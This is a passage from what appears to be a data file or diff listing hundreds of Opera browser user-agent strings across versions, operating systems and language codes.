Windows NT 5.1; de) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 7.60 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.01 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.02 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.52 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.53 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.26 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; es-la) Opera 9.27 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; fr) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; IT) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.52 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.53 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 9.52 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.51 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.53 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; tr) Opera 8.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 8.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; ru) Opera 8.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.26 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.02 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.52 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.54 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.22 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.27 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; ru) Opera 8.51 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50 +Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.60 +Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 +Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62 +Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51 +Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 +Mozilla/5.0 (Macintosh; Intel Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 +Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.51 +Mozilla/5.0 (Windows 98; U; en) Opera 8.54 +Mozilla/5.0 (Windows ME; U; en) Opera 8.51 +Mozilla/5.0 (Windows NT 5.0; U; de) Opera 8.50 +Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0 +Mozilla/5.0 (Windows NT 5.1; U; de) Opera 8.50 +Mozilla/5.0 (Windows NT 5.1; U; de) Opera 8.52 +Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 +Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52 +Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 +Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 +Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.0 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.02 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.51 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.52 +Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.53 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.22 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.26 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11 +Mozilla/5.0 (Windows NT 5.1; U; es-la; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 +Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 +Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 +Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 +Mozilla/5.0 (Windows NT 5.1; U; fr) Opera 8.51 +Mozilla/5.0 (Windows NT 5.1; U; pl) Opera 8.54 +Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 +Mozilla/5.0 (Windows NT 5.1; U; ru) Opera 8.51 +Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50 +Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 +Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 +Mozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 +Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 +Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14 +Mozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 +Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 +Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10 +Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01 +Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 +Mozilla/5.0 (Windows NT 6.1; U; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01 +Mozilla/5.0 (X11; Linux i686; U; en) Opera 8.52 +Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.23 +Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 +Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62 +Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60 +Opera/8.00 (Windows NT 5.1; U; en) +Opera/8.01 (Macintosh; PPC Mac OS X; U; en) +Opera/8.01 (Macintosh; U; PPC Mac OS; en) +Opera/8.01 (Windows NT 5.0; U; de) +Opera/8.01 (Windows NT 5.1; U; de) +Opera/8.01 (Windows NT 5.1; U; en) +Opera/8.01 (Windows NT 5.1; U; fr) +Opera/8.01 (Windows NT 5.1; U; pl) +Opera/8.02 (Windows NT 5.1; U; de) +Opera/8.02 (Windows NT 5.1; U; en) +Opera/8.02 (Windows NT 5.1; U; ru) +Opera/8.0 (Windows NT 5.1; U; en) +Opera/8.0 (X11; Linux i686; U; cs) +Opera/8.10 (Windows NT 5.1; U; en) +Opera/8.50 (Windows 98; U; en) +Opera/8.50 (Windows 98; U; ru) +Opera/8.50 (Windows ME; U; en) +Opera/8.50 (Windows NT 4.0; U; zh-cn) +Opera/8.50 (Windows NT 5.0; U; de) +Opera/8.50 (Windows NT 5.0; U; en) +Opera/8.50 (Windows NT 5.0; U; fr) +Opera/8.50 (Windows NT 5.1; U; de) +Opera/8.50 (Windows NT 5.1; U; en) +Opera/8.50 (Windows NT 5.1; U; es-ES) +Opera/8.50 (Windows NT 5.1; U; fr) +Opera/8.50 (Windows NT 5.1; U; pl) +Opera/8.50 (Windows NT 5.1; U; ru) +Opera/8.51 (FreeBSD 5.1; U; en) +Opera/8.51 (Macintosh; PPC Mac OS X; U; de) +Opera/8.51 (Windows 98; U; en) +Opera/8.51 (Windows NT 5.0; U; en) +Opera/8.51 (Windows NT 5.1; U; de) +Opera/8.51 (Windows NT 5.1; U; en) +Opera/8.51 (Windows NT 5.1; U; fr) +Opera/8.51 (Windows NT 5.1; U; nb) +Opera/8.51 (Windows NT 5.1; U; pl) +Opera/8.51 (X11; Linux i686; U; en) +Opera/8.51 (X11; Linux x86_64; U; en) +Opera/8.51 (X11; U; Linux i686; en-US; rv:1.8) +Opera/8.52 (Windows ME; U; en) +Opera/8.52 (Windows NT 5.0; U; en) +Opera/8.52 (Windows NT 5.1; U; en) +Opera/8.52 (Windows NT 5.1; U; ru) +Opera/8.52 (X11; Linux i686; U; en) +Opera/8.52 (X11; Linux x86_64; U; en) +Opera/8.53 (Windows 98; U; en) +Opera/8.53 (Windows NT 5.0; U; en) +Opera/8.53 (Windows NT 5.1; U; de) +Opera/8.53 (Windows NT 5.1; U; en) +Opera/8.53 (Windows NT 5.1; U; pt) +Opera/8.53 (Windows NT 5.2; U; en) +Opera/8.54 (Windows 98; U; en) +Opera/8.54 (Windows NT 4.0; U; zh-cn) +Opera/8.54 (Windows NT 5.0; U; de) +Opera/8.54 (Windows NT 5.0; U; en) +Opera/8.54 (Windows NT 5.1; U; en) +Opera/8.54 (Windows NT 5.1; U; pl) +Opera/8.54 (Windows NT 5.1; U; ru) +Opera/8.54 (X11; Linux i686; U; de) +Opera/8.54 (X11; Linux i686; U; pl) +Opera/9.00 (Macintosh; PPC Mac OS X; U; es) +Opera/9.00 (Windows NT 5.0; U; en) +Opera/9.00 (Windows NT 5.1; U; de) +Opera/9.00 (Windows NT 5.1; U; en) +Opera/9.00 (Windows NT 5.1; U; es-es) +Opera/9.00 (Windows NT 5.1; U; fi) +Opera/9.00 (Windows NT 5.1; U; fr) +Opera/9.00 (Windows NT 5.1; U; it) +Opera/9.00 (Windows NT 5.1; U; ja) +Opera/9.00 (Windows NT 5.1; U; nl) +Opera/9.00 (Windows NT 5.1; U; pl) +Opera/9.00 (Windows NT 5.1; U; ru) +Opera/9.00 (Windows NT 5.2; U; en) +Opera/9.00 (Windows NT 5.2; U; pl) +Opera/9.00 (Windows NT 5.2; U; ru) +Opera/9.00 (Windows; U) +Opera/9.00 (X11; Linux i686; U; de) +Opera/9.00 (X11; Linux i686; U; en) +Opera/9.00 (X11; Linux i686; U; pl) +Opera/9.01 (Macintosh; PPC Mac OS X; U; en) +Opera/9.01 (Macintosh; PPC Mac OS X; U; it) +Opera/9.01 (Windows NT 5.0; U; de) +Opera/9.01 (Windows NT 5.0; U; en) +Opera/9.01 (Windows NT 5.1) +Opera/9.01 (Windows NT 5.1; U; bg) +Opera/9.01 (Windows NT 5.1; U; cs) +Opera/9.01 (Windows NT 5.1; U; da) +Opera/9.01 (Windows NT 5.1; U; de) +Opera/9.01 (Windows NT 5.1; U; en) +Opera/9.01 (Windows NT 5.1; U; es-es) +Opera/9.01 (Windows NT 5.1; U; ja) +Opera/9.01 (Windows NT 5.1; U; pl) +Opera/9.01 (Windows NT 5.1; U; ru) +Opera/9.01 (Windows NT 5.2; U; en) +Opera/9.01 (Windows NT 5.2; U; ru) +Opera/9.01 (X11; FreeBSD 6 i386; U; en) +Opera/9.01 (X11; FreeBSD 6 i386; U;pl) +Opera/9.01 (X11; Linux i686; U; en) +Opera/9.01 (X11; OpenBSD i386; U; en) +Opera/9.02 (Windows NT 5.0; U; en) +Opera/9.02 (Windows NT 5.0; U; pl) +Opera/9.02 (Windows NT 5.0; U; sv) +Opera/9.02 (Windows NT 5.1; U; de) +Opera/9.02 (Windows NT 5.1; U; en) +Opera/9.02 (Windows NT 5.1; U; fi) +Opera/9.02 (Windows NT 5.1; U; ja) +Opera/9.02 (Windows NT 5.1; U; nb) +Opera/9.02 (Windows NT 5.1; U; pl) +Opera/9.02 (Windows NT 5.1; U; pt-br) +Opera/9.02 (Windows NT 5.1; U; ru) +Opera/9.02 (Windows NT 5.1; U; zh-cn) +Opera/9.02 (Windows NT 5.2; U; de) +Opera/9.02 (Windows NT 5.2; U; en) +Opera/9.02 (Windows; U; nl) +Opera/9.02 (Windows XP; U; ru) +Opera/9.02 (X11; Linux i686; U; de) +Opera/9.02 (X11; Linux i686; U; en) +Opera/9.02 (X11; Linux i686; U; hu) +Opera/9.02 (X11; Linux i686; U; pl) +Opera/9.10 (Windows NT 5.1; U; es-es) +Opera/9.10 (Windows NT 5.1; U; fi) +Opera/9.10 (Windows NT 5.1; U; hu) +Opera/9.10 (Windows NT 5.1; U; it) +Opera/9.10 (Windows NT 5.1; U; nl) +Opera/9.10 (Windows NT 5.1; U; pl) +Opera/9.10 (Windows NT 5.1; U; pt) +Opera/9.10 (Windows NT 5.1; U; sv) +Opera/9.10 (Windows NT 5.1; U; zh-tw) +Opera/9.10 (Windows NT 5.2; U; de) +Opera/9.10 (Windows NT 5.2; U; en) +Opera/9.10 (Windows NT 6.0; U; en) +Opera/9.10 (Windows NT 6.0; U; it-IT) +Opera/9.10 (X11; Linux i386; U; en) +Opera/9.10 (X11; Linux i686; U; en) +Opera/9.10 (X11; Linux i686; U; kubuntu;pl) +Opera/9.10 (X11; Linux i686; U; pl) +Opera/9.10 (X11; Linux; U; en) +Opera/9.10 (X11; Linux x86_64; U; en) +Opera/9.12 (Windows NT 5.0; U) +Opera/9.12 (Windows NT 5.0; U; ru) +Opera/9.12 (X11; Linux i686; U; en) (Ubuntu) +Opera/9.20 (Windows NT 5.1; U; en) +Opera/9.20(Windows NT 5.1; U; en) +Opera/9.20 (Windows NT 5.1; U; es-AR) +Opera/9.20 (Windows NT 5.1; U; es-es) +Opera/9.20 (Windows NT 5.1; U; it) +Opera/9.20 (Windows NT 5.1; U; nb) +Opera/9.20 (Windows NT 5.1; U; zh-tw) +Opera/9.20 (Windows NT 5.2; U; en) +Opera/9.20 (Windows NT 6.0; U; de) +Opera/9.20 (Windows NT 6.0; U; en) +Opera/9.20 (Windows NT 6.0; U; es-es) +Opera/9.20 (X11; Linux i586; U; en) +Opera/9.20 (X11; Linux i686; U; en) +Opera/9.20 (X11; Linux i686; U; es-es) +Opera/9.20 (X11; Linux i686; U; pl) +Opera/9.20 (X11; Linux i686; U; ru) +Opera/9.20 (X11; Linux i686; U; tr) +Opera/9.20 (X11; Linux x86_64; U; en) +Opera/9.21 (Macintosh; Intel Mac OS X; U; en) +Opera/9.21 (Macintosh; PPC Mac OS X; U; en) +Opera/9.21 (Windows 98; U; en) +Opera/9.21 (Windows NT 5.0; U; de) +Opera/9.21 (Windows NT 5.1; U; de) +Opera/9.21 (Windows NT 5.1; U; en) +Opera/9.21 (Windows NT 5.1; U; fr) +Opera/9.21 (Windows NT 5.1; U; nl) +Opera/9.21 (Windows NT 5.1; U; pl) +Opera/9.21 (Windows NT 5.1; U; pt-br) +Opera/9.21 (Windows NT 5.1; U; ru) +Opera/9.21 (Windows NT 5.2; U; en) +Opera/9.21 (Windows NT 6.0; U; en) +Opera/9.21 (Windows NT 6.0; U; nb) +Opera/9.21 (X11; Linux i686; U; de) +Opera/9.21 (X11; Linux i686; U; en) +Opera/9.21 (X11; Linux i686; U; es-es) +Opera/9.21 (X11; Linux x86_64; U; en) +Opera/9.22 (Windows NT 5.1; U; en) +Opera/9.22 (Windows NT 5.1; U; fr) +Opera/9.22 (Windows NT 5.1; U; pl) +Opera/9.22 (Windows NT 6.0; U; en) +Opera/9.22 (Windows NT 6.0; U; ru) +Opera/9.22 (X11; Linux i686; U; de) +Opera/9.22 (X11; Linux i686; U; en) +Opera/9.22 (X11; OpenBSD i386; U; en) +Opera/9.23 (Macintosh; Intel Mac OS X; U; ja) +Opera/9.23 (Mac OS X; fr) +Opera/9.23 (Mac OS X; ru) +Opera/9.23 (Windows NT 5.0; U; de) +Opera/9.23 (Windows NT 5.0; U; en) +Opera/9.23 (Windows NT 5.1; U; da) +Opera/9.23 (Windows NT 5.1; U; de) +Opera/9.23 (Windows NT 5.1; U; en) +Opera/9.23 (Windows NT 5.1; U; fi) +Opera/9.23 (Windows NT 5.1; U; it) +Opera/9.23 (Windows NT 5.1; U; ja) +Opera/9.23 (Windows NT 5.1; U; pt) +Opera/9.23 (Windows NT 5.1; U; zh-cn) +Opera/9.23 (Windows NT 6.0; U; de) +Opera/9.23 (X11; Linux i686; U; en) +Opera/9.23 (X11; Linux i686; U; es-es) +Opera/9.23 (X11; Linux x86_64; U; en) +Opera/9.24 (Macintosh; PPC Mac OS X; U; en) +Opera/9.24 (Windows NT 5.0; U; ru) +Opera/9.24 (Windows NT 5.1; U; ru) +Opera/9.24 (Windows NT 5.1; U; tr) +Opera/9.24 (X11; Linux i686; U; de) +Opera/9.24 (X11; SunOS i86pc; U; en) +Opera/9.25 (Macintosh; Intel Mac OS X; U; en) +Opera/9.25 (Macintosh; PPC Mac OS X; U; en) +Opera/9.25 (OpenSolaris; U; en) +Opera/9.25 (Windows NT 4.0; U; en) +Opera/9.25 (Windows NT 5.0; U; cs) +Opera/9.25 (Windows NT 5.0; U; en) +Opera/9.25 (Windows NT 5.1; U; de) +Opera/9.25 (Windows NT 5.1; U; lt) +Opera/9.25 (Windows NT 5.1; U; ru) +Opera/9.25 (Windows NT 5.1; U; zh-cn) +Opera/9.25 (Windows NT 5.2; U; en) +Opera/9.25 (Windows NT 6.0; U; en-US) +Opera/9.25 (Windows NT 6.0; U; ru) +Opera/9.25 (Windows NT 6.0; U; sv) +Opera/9.25 (X11; Linux i686; U; en) +Opera/9.25 (X11; Linux i686; U; fr) +Opera/9.25 (X11; Linux i686; U; fr-ca) +Opera/9.26 (Macintosh; PPC Mac OS X; U; en) +Opera/9.26 (Windows NT 5.1; U; de) +Opera/9.26 (Windows NT 5.1; U; nl) +Opera/9.26 (Windows NT 5.1; U; pl) +Opera/9.26 (Windows NT 5.1; U; zh-cn) +Opera/9.26 (Windows; U; pl) +Opera/9.27 (Macintosh; Intel Mac OS X; U; sv) +Opera/9.27 (Windows NT 5.1; U; ja) +Opera/9.27 (Windows NT 5.2; U; en) +Opera/9.27 (X11; Linux i686; U; en) +Opera/9.27 (X11; Linux i686; U; fr) +Opera/9.4 (Windows NT 5.3; U; en) +Opera/9.4 (Windows NT 6.1; U; en) +Opera/9.50 (Macintosh; Intel Mac OS X; U; de) +Opera/9.50 (Macintosh; Intel Mac OS X; U; en) +Opera/9.50 (Windows NT 5.1; U; es-ES) +Opera/9.50 (Windows NT 5.1; U; it) +Opera/9.50 (Windows NT 5.1; U; nl) +Opera/9.50 (Windows NT 5.1; U; nn) +Opera/9.50 (Windows NT 5.1; U; ru) +Opera/9.50 (Windows NT 5.2; U; it) +Opera/9.50 (X11; Linux i686; U; es-ES) +Opera/9.50 (X11; Linux x86_64; U; nb) +Opera/9.50 (X11; Linux x86_64; U; pl) +Opera/9.51 (Macintosh; Intel Mac OS X; U; en) +Opera/9.51 (Windows NT 5.1; U; da) +Opera/9.51 (Windows NT 5.1; U; en) +Opera/9.51 (Windows NT 5.1; U; en-GB) +Opera/9.51 (Windows NT 5.1; U; es-AR) +Opera/9.51 (Windows NT 5.1; U; es-LA) +Opera/9.51 (Windows NT 5.1; U; fr) +Opera/9.51 (Windows NT 5.1; U; nn) +Opera/9.51 (Windows NT 5.2; U; en) +Opera/9.51 (Windows NT 6.0; U; en) +Opera/9.51 (Windows NT 6.0; U; es) +Opera/9.51 (Windows NT 6.0; U; sv) +Opera/9.51 (X11; Linux i686; U; de) +Opera/9.51 (X11; Linux i686; U; fr) +Opera/9.51 (X11; Linux i686; U; Linux Mint; en) +Opera/9.52 (Macintosh; Intel Mac OS X; U; pt) +Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR) +Opera/9.52 (Macintosh; PPC Mac OS X; U; fr) +Opera/9.52 (Macintosh; PPC Mac OS X; U; ja) +Opera/9.52 (Windows NT 5.0; U; en) +Opera/9.52 (Windows NT 5.2; U; ru) +Opera/9.52 (Windows NT 6.0; U; de) +Opera/9.52 (Windows NT 6.0; U; en) +Opera/9.52 (Windows NT 6.0; U; fr) +Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en) +Opera/9.52 (X11; Linux i686; U; cs) +Opera/9.52 (X11; Linux i686; U; en) +Opera/9.52 (X11; Linux i686; U; fr) +Opera/9.52 (X11; Linux x86_64; U) +Opera/9.52 (X11; Linux x86_64; U; en) +Opera/9.52 (X11; Linux x86_64; U; ru) +Opera/9.5 (Windows NT 5.1; U; fr) +Opera/9.5 (Windows NT 6.0; U; en) +Opera/9.60 (Windows NT 5.0; U; en) Presto/2.1.1 +Opera/9.60 (Windows NT 5.1; U; en-GB) Presto/2.1.1 +Opera/9.60 (Windows NT 5.1; U; es-ES) Presto/2.1.1 +Opera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1 +Opera/9.60 (Windows NT 5.1; U; tr) Presto/2.1.1 +Opera/9.60 (Windows NT 6.0; U; bg) Presto/2.1.1 +Opera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1 +Opera/9.60 (Windows NT 6.0; U; pl) Presto/2.1.1 +Opera/9.60 (Windows NT 6.0; U; ru) Presto/2.1.1 +Opera/9.60 (Windows NT 6.0; U; uk) Presto/2.1.1 +Opera/9.60 (X11; Linux i686; U; en-GB) Presto/2.1.1 +Opera/9.60 (X11; Linux i686; U; ru) Presto/2.1.1 +Opera/9.60 (X11; Linux x86_64; U) +Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; en-GB) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; en) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; fr) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; ru) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 +Opera/9.61 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 +Opera/9.61 (Windows NT 5.2; U; en) Presto/2.1.1 +Opera/9.61 (Windows NT 6.0; U; en) Presto/2.1.1 +Opera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1 +Opera/9.61 (Windows NT 6.0; U; pt-BR) Presto/2.1.1 +Opera/9.61 (Windows NT 6.0; U; ru) Presto/2.1.1 +Opera/9.61 (X11; Linux i686; U; de) Presto/2.1.1 +Opera/9.61 (X11; Linux i686; U; en) Presto/2.1.1 +Opera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1 +Opera/9.61 (X11; Linux i686; U; ru) Presto/2.1.1 +Opera/9.61 (X11; Linux x86_64; U; fr) Presto/2.1.1 +Opera/9.62 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 +Opera/9.62 (Windows NT 5.1; U; ru) Presto/2.1.1 +Opera/9.62 (Windows NT 5.1; U; tr) Presto/2.1.1 +Opera/9.62 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 +Opera/9.62 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 +Opera/9.62 (Windows NT 5.2; U; en) Presto/2.1.1 +Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1 +Opera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1 +Opera/9.62 (Windows NT 6.0; U; en) Presto/2.1.1 +Opera/9.62 (Windows NT 6.0; U; nb) Presto/2.1.1 +Opera/9.62 (Windows NT 6.0; U; pl) Presto/2.1.1 +Opera/9.62 (Windows NT 6.1; U; de) Presto/2.1.1 +Opera/9.62 (Windows NT 6.1; U; en) Presto/2.1.1 +Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1 +Opera/9.62 (X11; Linux i686; U; fi) Presto/2.1.1 +Opera/9.62 (X11; Linux i686; U; it) Presto/2.1.1 +Opera/9.62 (X11; Linux i686; U; Linux Mint; en) Presto/2.1.1 +Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1 +Opera/9.62 (X11; Linux x86_64; U; en_GB, en_US) Presto/2.1.1 +Opera/9.62 (X11; Linux x86_64; U; ru) Presto/2.1.1 +Opera/9.63 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 +Opera/9.63 (Windows NT 5.2; U; de) Presto/2.1.1 +Opera/9.63 (Windows NT 5.2; U; en) Presto/2.1.1 +Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1 +Opera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1 +Opera/9.63 (Windows NT 6.0; U; fr) Presto/2.1.1 +Opera/9.63 (Windows NT 6.0; U; nb) Presto/2.1.1 +Opera/9.63 (Windows NT 6.0; U; pl) Presto/2.1.1 +Opera/9.63 (Windows NT 6.1; U; de) Presto/2.1.1 +Opera/9.63 (Windows NT 6.1; U; en) Presto/2.1.1 +Opera/9.63 (Windows NT 6.1; U; hu) Presto/2.1.1 +Opera/9.63 (X11; FreeBSD 7.1-RELEASE i386; U; en) Presto/2.1.1 +Opera/9.63 (X11; Linux i686) +Opera/9.63 (X11; Linux i686; U; de) Presto/2.1.1 +Opera/9.63 (X11; Linux i686; U; en) +Opera/9.63 (X11; Linux i686; U; nb) Presto/2.1.1 +Opera/9.63 (X11; Linux i686; U; ru) +Opera/9.63 (X11; Linux i686; 